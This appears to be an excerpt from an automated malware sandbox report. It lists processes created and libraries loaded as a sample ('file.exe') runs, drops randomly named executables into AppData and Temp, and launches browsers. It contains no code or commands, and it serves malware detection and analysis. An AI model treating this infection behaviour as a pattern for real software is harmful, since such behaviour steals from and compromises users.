Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 --field-trial-handle=2252,i,8316535468258998242,13647816152217596395,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=2104,i,9402509172041055831,1536830809750770573,262144 /prefetch:3
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2268 -parentBuildID 20230927232528 -prefsHandle 2188 -prefMapHandle 2148 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3d9a631-0c4f-4452-8e9e-490c2e469294} 6968 "\\.\pipe\gecko-crash-server-pipe.6968" 16dcc56d910 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4548 -parentBuildID 20230927232528 -prefsHandle 4540 -prefMapHandle 4536 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3a73529-841c-43f4-a1e0-97d887784ff3} 6968 "\\.\pipe\gecko-crash-server-pipe.6968" 16ddf13f710 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3020 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6772 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6916 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=7960 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=8128 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe "C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll
